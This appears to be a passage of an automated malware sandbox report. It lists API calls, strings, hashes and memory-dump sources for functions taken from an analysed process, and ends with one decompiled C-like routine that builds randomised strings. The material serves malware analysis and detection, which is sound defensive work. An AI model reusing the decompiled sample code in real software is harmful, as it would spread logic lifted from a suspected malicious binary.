HeapFree.KERNEL32(00000000,?,?), ref: 02CE56F7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02CE5703
HeapFree.KERNEL32(00000000,?,?,03BA95B0), ref: 02CE570F
HeapFree.KERNEL32(00000000,?), ref: 02CE571B
HeapFree.KERNEL32(00000000,?), ref: 02CE5727

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 3748877296-0
Opcode ID: 9d344aad6c90f3821c136de6cbdd4f0ca8faa4e7b84d2990d33409002fa222eb
Instruction ID: 6c8b0268e865dfd5abedd001681bb32afce6e005e35d7b07a3e5d28aa840d1ec
Opcode Fuzzy Hash: 9d344aad6c90f3821c136de6cbdd4f0ca8faa4e7b84d2990d33409002fa222eb
Instruction Fuzzy Hash: A7912871900219EFCF11DFA4DC88A9EBBB9EF48354F144955F40A9B260DB31DA61DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C1BE0, Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 419COMMON

Download Yara Rule

APIs

Part of subcall function 00346EC2: RtlEnterCriticalSection.NTDLL(004E9A1C), ref: 00346ECD
Part of subcall function 00346EC2: RtlLeaveCriticalSection.NTDLL(004E9A1C), ref: 00346F0A

__Init_thread_footer.LIBCMT ref: 001C243E

Strings

1, xrefs: 001C213A
, xrefs: 001C1F6C
F, xrefs: 001C2369
4, xrefs: 001C248D
!, xrefs: 001C1FB9
2, xrefs: 001C2187
@, xrefs: 001C21D4
#, xrefs: 001C2053
E, xrefs: 001C232E
A, xrefs: 001C2221
$, xrefs: 001C20A0
B, xrefs: 001C226E
C, xrefs: 001C22B8
D, xrefs: 001C22F3
", xrefs: 001C2006
0, xrefs: 001C20ED

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSection$EnterInit_thread_footerLeave
String ID: $!$"$#$$$0$1$2$4$@$A$B$C$D$E$F
API String ID: 3960375172-1916289598
Opcode ID: 58645238bb0dd4807b8506b1e0fadc8a6fdcfa92619cfb4e40868699a31f6f0f
Instruction ID: 035418b7092fb0a09d71cb29cccd531e3aacfa2bc5793281ba628396f0ed4e12
Opcode Fuzzy Hash: 58645238bb0dd4807b8506b1e0fadc8a6fdcfa92619cfb4e40868699a31f6f0f
Instruction Fuzzy Hash: E832D3B09053A89EEB61DF64C8597DDBBF1AB15308F1041DAD44CBB282D7BA1E88CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001BD9A0, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 168synchronizationCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 001BD9B6
GetLastError.KERNEL32 ref: 001BD9C8
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 001BD9FB
GetLastError.KERNEL32 ref: 001BDA0D
GetLastError.KERNEL32(?,?,?), ref: 001BDA64
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 001BDAA7
SetEvent.KERNEL32(?,004D8488,0039B06C,?,00000000,003862FD,000000FF), ref: 001BDB24
SetEvent.KERNEL32(00000000), ref: 001BDB3D
SleepEx.KERNEL32(000000FF,00000001), ref: 001BDB47

Strings

thread.exit_event, xrefs: 001BDAC6
thread.entry_event, xrefs: 001BDAB9
PkH, xrefs: 001BD9DD, 001BDA22, 001BDA95
thread, xrefs: 001BDAD3

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Event$ErrorLast$Create$ObjectSingleSleepWait
String ID: PkH$thread$thread.entry_event$thread.exit_event
API String ID: 1625995971-79864433
Opcode ID: 9e3c9b42b7884a390a931d8e8e36b314217ba1acdeae4d1a5ef0d45cc9ee9926
Instruction ID: 78e9170b74ce8e97dcd5086bda5f821d4932fb0373803b1c368552187e7a4709
Opcode Fuzzy Hash: 9e3c9b42b7884a390a931d8e8e36b314217ba1acdeae4d1a5ef0d45cc9ee9926
Instruction Fuzzy Hash: 3E51C971A00214AFDB11EF64DD85B9EBBB8EF48710F14816AF915EB390EB75AD04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001BE580, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 282timeCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 001BE5CA
SetWaitableTimer.KERNEL32(00000001,?,000493E0,?,?,?,?,?), ref: 001BE67A
RtlLeaveCriticalSection.NTDLL(?), ref: 001BE690
SetLastError.KERNEL32(00000000,004D8488,00000000,?,?), ref: 001BE6AD
GetQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,?), ref: 001BE6C5
GetLastError.KERNEL32(?,?), ref: 001BE6CD
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001,?,?), ref: 001BE7E9
GetLastError.KERNEL32(?,?), ref: 001BE7F7
PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001,?,?), ref: 001BE856
GetLastError.KERNEL32(?,?), ref: 001BE860

Strings

pqcs, xrefs: 001BE8EE
PkH, xrefs: 001BE6E3, 001BE749, 001BE822, 001BE86B, 001BE8A7

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorLast$CompletionQueuedStatus$CriticalPostSection$EnterLeaveTimerWaitable
String ID: PkH$pqcs
API String ID: 4194479484-3610218348
Opcode ID: 527e8598319a855a76b38a86623479d1e9e30a1459eca5675406b4e2cca1c58d
Instruction ID: 6cb05ead48b8e2e4734fce49c262115a49d6e6abf42a5a213b4c6d26ab5d0b1e
Opcode Fuzzy Hash: 527e8598319a855a76b38a86623479d1e9e30a1459eca5675406b4e2cca1c58d
Instruction Fuzzy Hash: 84B18B70A006099FCB25DFA5D984BEEBBF9FF18314F10452AE805E7640EB75A944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA92B70, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6DA92BB4

Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA948BF
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA948D1
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA948E3
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA948F5
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA94907
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA94919
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA9492B
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA9493D
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA9494F
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA94961
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA94973
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA94985
Part of subcall function 6DA948A2: _free.LIBCMT ref: 6DA94997

_free.LIBCMT ref: 6DA92BA9

Part of subcall function 6DA85D5B: RtlFreeHeap.NTDLL(00000000,00000000,?,6DA76800,?,00000000,?,6DA68B9E,00000000,00000011,00000001), ref: 6DA85D71
Part of subcall function 6DA85D5B: GetLastError.KERNEL32(00000000,?,6DA76800,?,00000000,?,6DA68B9E,00000000,00000011,00000001), ref: 6DA85D83

_free.LIBCMT ref: 6DA92BCB
_free.LIBCMT ref: 6DA92BE0
_free.LIBCMT ref: 6DA92BEB
_free.LIBCMT ref: 6DA92C0D
_free.LIBCMT ref: 6DA92C20
_free.LIBCMT ref: 6DA92C2E
_free.LIBCMT ref: 6DA92C39
_free.LIBCMT ref: 6DA92C71
_free.LIBCMT ref: 6DA92C78
_free.LIBCMT ref: 6DA92C95
_free.LIBCMT ref: 6DA92CAD

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 636102157870b0082a5412079be57fc0fe31cbf539b63f1b9d6a3b690cdaa1ee
Instruction ID: d64c2a2f4e61b778cab325209b1f0135b3c820bb710a1a132fc6478c6db651c6
Opcode Fuzzy Hash: 636102157870b0082a5412079be57fc0fe31cbf539b63f1b9d6a3b690cdaa1ee
Instruction Fuzzy Hash: E531807661C3469FFB209E38D944B6A73E8EF00314F554929ED5ADB161DF70E9C18B10

Uniqueness

Uniqueness Score: -1.00%

Function 0036C958, Relevance: 19.6, APIs: 13, Instructions: 88COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0036C975

Part of subcall function 00365F88: HeapFree.KERNEL32(00000000,00000000,?,0036D0AD,?,00000000,?,?,?,0036D350,?,00000007,?,?,0036D946,?), ref: 00365F9E
Part of subcall function 00365F88: GetLastError.KERNEL32(?,?,0036D0AD,?,00000000,?,?,?,0036D350,?,00000007,?,?,0036D946,?,?), ref: 00365FB0

_free.LIBCMT ref: 0036C987
_free.LIBCMT ref: 0036C999
_free.LIBCMT ref: 0036C9AB
_free.LIBCMT ref: 0036C9BD
_free.LIBCMT ref: 0036C9CF
_free.LIBCMT ref: 0036C9E1
_free.LIBCMT ref: 0036C9F3
_free.LIBCMT ref: 0036CA05
_free.LIBCMT ref: 0036CA17
_free.LIBCMT ref: 0036CA29
_free.LIBCMT ref: 0036CA3B
_free.LIBCMT ref: 0036CA4D

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f9e35e1f16d39890745a985656454cf9ab8a67cd6169e96f443a4100d521ae82
Instruction ID: 9cd1237f7c88515fe3aab67f480f8fed00e24b1a275dcdb6c40908742dc1b4e2
Opcode Fuzzy Hash: f9e35e1f16d39890745a985656454cf9ab8a67cd6169e96f443a4100d521ae82
Instruction Fuzzy Hash: D3216772555604EFCB22DB64F8C1C3A73FDAA14310BA5DD1AF085DB595CB30FC804628

Uniqueness

Uniqueness Score: -1.00%

Function 0036D7AF, Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0036D7E8

Part of subcall function 00365F88: HeapFree.KERNEL32(00000000,00000000,?,0036D0AD,?,00000000,?,?,?,0036D350,?,00000007,?,?,0036D946,?), ref: 00365F9E
Part of subcall function 00365F88: GetLastError.KERNEL32(?,?,0036D0AD,?,00000000,?,?,?,0036D350,?,00000007,?,?,0036D946,?,?), ref: 00365FB0

Part of subcall function 0036C958: _free.LIBCMT ref: 0036C975
Part of subcall function 0036C958: _free.LIBCMT ref: 0036C987
Part of subcall function 0036C958: _free.LIBCMT ref: 0036C999
Part of subcall function 0036C958: _free.LIBCMT ref: 0036C9AB
Part of subcall function 0036C958: _free.LIBCMT ref: 0036C9BD
Part of subcall function 0036C958: _free.LIBCMT ref: 0036C9CF
Part of subcall function 0036C958: _free.LIBCMT ref: 0036C9E1
Part of subcall function 0036C958: _free.LIBCMT ref: 0036C9F3
Part of subcall function 0036C958: _free.LIBCMT ref: 0036CA05
Part of subcall function 0036C958: _free.LIBCMT ref: 0036CA17
Part of subcall function 0036C958: _free.LIBCMT ref: 0036CA29
Part of subcall function 0036C958: _free.LIBCMT ref: 0036CA3B
Part of subcall function 0036C958: _free.LIBCMT ref: 0036CA4D

_free.LIBCMT ref: 0036D80A
_free.LIBCMT ref: 0036D81F
_free.LIBCMT ref: 0036D82A
_free.LIBCMT ref: 0036D84C
_free.LIBCMT ref: 0036D85F
_free.LIBCMT ref: 0036D86D
_free.LIBCMT ref: 0036D878
_free.LIBCMT ref: 0036D8B0
_free.LIBCMT ref: 0036D8B7
_free.LIBCMT ref: 0036D8D4
_free.LIBCMT ref: 0036D8EC

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0f17ce4c798a8981599d03e3c3eef5d7817a660e68d76c0b6bbfb4d2b4b82c60
Instruction ID: 20e0cfe4d925d8b674b0150b60e1e3272cc135bda89fb9536b1059cd050af8db
Opcode Fuzzy Hash: 0f17ce4c798a8981599d03e3c3eef5d7817a660e68d76c0b6bbfb4d2b4b82c60
Instruction Fuzzy Hash: 46314932A04605DFEB22AA79D849B5A77E8AF10311F51C92AE459DF199DF34AC90CB20

Uniqueness

Uniqueness Score: -1.00%

Function 001BDCF0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 001BE900: VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 001BE945
Part of subcall function 001BE900: VerifyVersionInfoW.KERNEL32(?,00000002,00000000), ref: 001BE954

Part of subcall function 001BD5A0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,80000000,004D8488), ref: 001BD5E0
Part of subcall function 001BD5A0: GetLastError.KERNEL32(?,80000000,004D8488), ref: 001BD5EB

CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001BDDCB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 001BDDD8
CloseHandle.KERNEL32(00000000,00000010), ref: 001BDE45
PostQueuedCompletionStatus.KERNEL32(00000000,00000001,00000001,00000001), ref: 001BDEF2
GetLastError.KERNEL32 ref: 001BDEFC
RtlDeleteCriticalSection.NTDLL(004D8488), ref: 001BDF4C

Strings

mutex, xrefs: 001BDE6F
pqcs, xrefs: 001BDFAA
iocp, xrefs: 001BDE7C
PkH, xrefs: 001BDD9B, 001BDDE3, 001BDF07

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorLast$CompletionCriticalSection$CloseConditionCountCreateDeleteHandleInfoInitializeMaskPortPostQueuedSpinStatusVerifyVersion
String ID: PkH$iocp$mutex$pqcs
API String ID: 1789439036-2892780418
Opcode ID: cfe7d062b1371edb1574df7e7fcd7b3a152cce989d13009b3432f04a8723c16f
Instruction ID: 6c14078a57263b5f5b20a2065460a8c472e466b4d0c613e2c9479cd99417e5dd
Opcode Fuzzy Hash: cfe7d062b1371edb1574df7e7fcd7b3a152cce989d13009b3432f04a8723c16f
Instruction Fuzzy Hash: 5181E2B0A007059FD721EF25D845BABBBF8FF15714F00862EE4469B790E779A908CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001E2AA0, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001E2ADD
std::_Lockit::_Lockit.LIBCPMT ref: 001E2AFD
std::_Lockit::~_Lockit.LIBCPMT ref: 001E2B1D
std::_Facet_Register.LIBCPMT ref: 001E2C78
std::_Lockit::~_Lockit.LIBCPMT ref: 001E2C90
Concurrency::cancel_current_task.LIBCPMT ref: 001E2CA9
Concurrency::cancel_current_task.LIBCPMT ref: 001E2CAE
Concurrency::cancel_current_task.LIBCPMT ref: 001E2CB3

Strings

false, xrefs: 001E2C23
true, xrefs: 001E2C49

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
String ID: false$true
API String ID: 3742692055-2658103896
Opcode ID: 4a042de648d39c128143453357d0216b058f09640b889ada4ab93067be475b92
Instruction ID: 73f9a6fdfaf9fa694fe2cfc9e49a941b5cf5731825cdafd2afef6496fc37c384
Opcode Fuzzy Hash: 4a042de648d39c128143453357d0216b058f09640b889ada4ab93067be475b92
Instruction Fuzzy Hash: E551DEB09016448FDB25DF64C991BAEBBF4EF04710F14486DE805AF392DBB5B905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001EC430, Relevance: 13.9, APIs: 9, Instructions: 410COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 001EC4F1
SetEvent.KERNEL32(00000000), ref: 001EC581
SetEvent.KERNEL32(00000000), ref: 001EC611
SetEvent.KERNEL32(00000000), ref: 001EC6B6
SetEvent.KERNEL32(00000000), ref: 001EC746
SetEvent.KERNEL32(00000000), ref: 001EC7D6
SetEvent.KERNEL32(00000000), ref: 001EC85E
SetEvent.KERNEL32(00000000), ref: 001EC8E3
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001EC942

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: 3f64f24c625ce9d1947b169cca8610e2f4317322105dd207256e9fd21a677291
Instruction ID: 9679194610ccfa8df9a679924edbcde40e32ced45e3741713f29ab7fcb07cb41
Opcode Fuzzy Hash: 3f64f24c625ce9d1947b169cca8610e2f4317322105dd207256e9fd21a677291
Instruction Fuzzy Hash: 12E10530A01B858FDB268B1ACC44B6DBBE1AF95768F1A405DD85997391CB38DD43CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 001ED500, Relevance: 13.9, APIs: 9, Instructions: 410COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 001ED5C1
SetEvent.KERNEL32(00000000), ref: 001ED651
SetEvent.KERNEL32(00000000), ref: 001ED6E1
SetEvent.KERNEL32(00000000), ref: 001ED786
SetEvent.KERNEL32(00000000), ref: 001ED816
SetEvent.KERNEL32(00000000), ref: 001ED8A6
SetEvent.KERNEL32(00000000), ref: 001ED92E
SetEvent.KERNEL32(00000000), ref: 001ED9B3
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001EDA12

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: 88f6bffedc10a4a32bcbd6e44bd2bb693fd297a942912d22ab04a5a1342e36bc
Instruction ID: 75f994e3b2f0bdfc7c39d89d44c94352253583e2f535e34a8cc17503ab48c21f
Opcode Fuzzy Hash: 88f6bffedc10a4a32bcbd6e44bd2bb693fd297a942912d22ab04a5a1342e36bc
Instruction Fuzzy Hash: 2DE12930A01A858FDB268F5AD844B6DBBF5EF95718F19401CEC5A9B391CB39DC42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001EDA30, Relevance: 13.9, APIs: 9, Instructions: 410COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 001EDAF1
SetEvent.KERNEL32(00000000), ref: 001EDB81
SetEvent.KERNEL32(00000000), ref: 001EDC11
SetEvent.KERNEL32(00000000), ref: 001EDCB6
SetEvent.KERNEL32(00000000), ref: 001EDD46
SetEvent.KERNEL32(00000000), ref: 001EDDD6
SetEvent.KERNEL32(00000000), ref: 001EDE5E
SetEvent.KERNEL32(00000000), ref: 001EDEE3
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001EDF42

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: 4f16c703d59fbaf838e4143facc1648e0fc329a9352c17961ca6c74769ee1e74
Instruction ID: 8054f23812d27cadba6c83804365a272a164eb28f885060ebef4e1804216f230
Opcode Fuzzy Hash: 4f16c703d59fbaf838e4143facc1648e0fc329a9352c17961ca6c74769ee1e74
Instruction Fuzzy Hash: 36E11630A01A859FDB26CF2AD94476DBBF1EF52724F19405CE81A9B2A1DB35DC42CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 001ECAA0, Relevance: 13.9, APIs: 9, Instructions: 410COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 001ECB61
SetEvent.KERNEL32(00000000), ref: 001ECBF1
SetEvent.KERNEL32(00000000), ref: 001ECC81
SetEvent.KERNEL32(00000000), ref: 001ECD26
SetEvent.KERNEL32(00000000), ref: 001ECDB6
SetEvent.KERNEL32(00000000), ref: 001ECE46
SetEvent.KERNEL32(00000000), ref: 001ECECE
SetEvent.KERNEL32(00000000), ref: 001ECF53
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001ECFB2

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: 7fb0f184009a984f347901e239c8c681ac30adf1403600e5d21de41a23b6ea7c
Instruction ID: 870185e19fdd40d5304bd5ccd30b4e1327b9e97f7502ed4595a3ee6b25a3bb8e
Opcode Fuzzy Hash: 7fb0f184009a984f347901e239c8c681ac30adf1403600e5d21de41a23b6ea7c
Instruction Fuzzy Hash: 55E1E330A01B958FDB268B2ACC4476EFBB6AF51725F19401CE81AA7291DB35DD43CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 001ECFD0, Relevance: 13.9, APIs: 9, Instructions: 410COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 001ED091
SetEvent.KERNEL32(00000000), ref: 001ED121
SetEvent.KERNEL32(00000000), ref: 001ED1B1
SetEvent.KERNEL32(00000000), ref: 001ED256
SetEvent.KERNEL32(00000000), ref: 001ED2E6
SetEvent.KERNEL32(00000000), ref: 001ED376
SetEvent.KERNEL32(00000000), ref: 001ED3FE
SetEvent.KERNEL32(00000000), ref: 001ED483
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001ED4E2

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: 7d2c22b7820e90505beb6146ce551c8b6fe456c0ce6c4ff67b1aab409d6c1907
Instruction ID: 07b1ec19d49f18d129fba44ca173dd428a5f262ea0b87a126726da5282c51f73
Opcode Fuzzy Hash: 7d2c22b7820e90505beb6146ce551c8b6fe456c0ce6c4ff67b1aab409d6c1907
Instruction Fuzzy Hash: BCE11830A01B858FDB268F1AD84476DBBB5EF62714F19401CE81A9B791CB39EC42CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 001EB8E0, Relevance: 13.9, APIs: 9, Instructions: 406COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 001EB9A8
SetEvent.KERNEL32(00000000), ref: 001EBA39
SetEvent.KERNEL32(00000000), ref: 001EBACA
SetEvent.KERNEL32(00000000), ref: 001EBB70
SetEvent.KERNEL32(00000000), ref: 001EBC01
SetEvent.KERNEL32(00000000), ref: 001EBC92
SetEvent.KERNEL32(00000000), ref: 001EBD1B
SetEvent.KERNEL32(00000000), ref: 001EBDA1
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001EBE00

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Event$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 718121409-0
Opcode ID: c26cda7cc7d5eb7f39ba3348e2d32c02ff4079960405bf9478ae645424d98efb
Instruction ID: 4c5ab3c551f7ded4bb614ed0f35df86348dcdb3387f6573a84a771a135b776d6
Opcode Fuzzy Hash: c26cda7cc7d5eb7f39ba3348e2d32c02ff4079960405bf9478ae645424d98efb
Instruction Fuzzy Hash: 93F10730A05A898FDB258B9AC8C4B6EB7B5BF56728F19411CD44AD7261DB34DC42CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE8F85, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E02CE8F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x2ced33c; // 0x3ba9c30
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E02CE9B1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x2cec18c;
				}
				_t46 = E02CE7F8B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E02CE1525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x2ced2a8; // 0xeba5a8
						_t16 = _t75 + 0x2ceeb08; // 0x530025
						 *0x2ced118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E02CE9B1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x2cec190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E02CE1525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E02CE8B22(_v20);
						} else {
							_t66 =  *0x2ced2a8; // 0xeba5a8
							_t31 = _t66 + 0x2ceec28; // 0x73006d
							 *0x2ced118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E02CE8B22(_v12);
				}
				return _v24;
			}

0x02ce8f8d
0x02ce8f93
0x02ce8f9a
0x02ce8fa0
0x02ce8fa4
0x02ce8fa8
0x02ce8fab
0x02ce8fb0
0x02ce8fb5
0x02ce8fb7
0x02ce8fb7
0x02ce8fc0
0x02ce8fc5
0x02ce8fca
0x02ce8fd0
0x02ce8fda
0x02ce8fe3
0x02ce8fea
0x02ce9003
0x02ce9008
0x02ce900d
0x02ce9016
0x02ce901f
0x02ce9030
0x02ce9039
0x02ce903d
0x02ce9041
0x02ce9046
0x02ce904b
0x02ce904d
0x02ce904d
0x02ce9057
0x02ce9060
0x02ce9067
0x02ce907f
0x02ce9083
0x02ce90c0
0x02ce9085
0x02ce9088
0x02ce9090
0x02ce90a1
0x02ce90ad
0x02ce90b5
0x02ce90b9
0x02ce90b9
0x02ce9083
0x02ce90c8
0x02ce90cd
0x02ce90d4

APIs

GetTickCount.KERNEL32 ref: 02CE8F9A
lstrlen.KERNEL32(?,80000002,00000005), ref: 02CE8FDA
lstrlen.KERNEL32(00000000), ref: 02CE8FE3
lstrlen.KERNEL32(00000000), ref: 02CE8FEA
lstrlenW.KERNEL32(80000002), ref: 02CE8FF7
lstrlen.KERNEL32(?,00000004), ref: 02CE9057
lstrlen.KERNEL32(?), ref: 02CE9060
lstrlen.KERNEL32(?), ref: 02CE9067
lstrlenW.KERNEL32(?), ref: 02CE906E

Part of subcall function 02CE8B22: HeapFree.KERNEL32(00000000,00000000,02CE131A,00000000,?,?,00000000), ref: 02CE8B2E

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

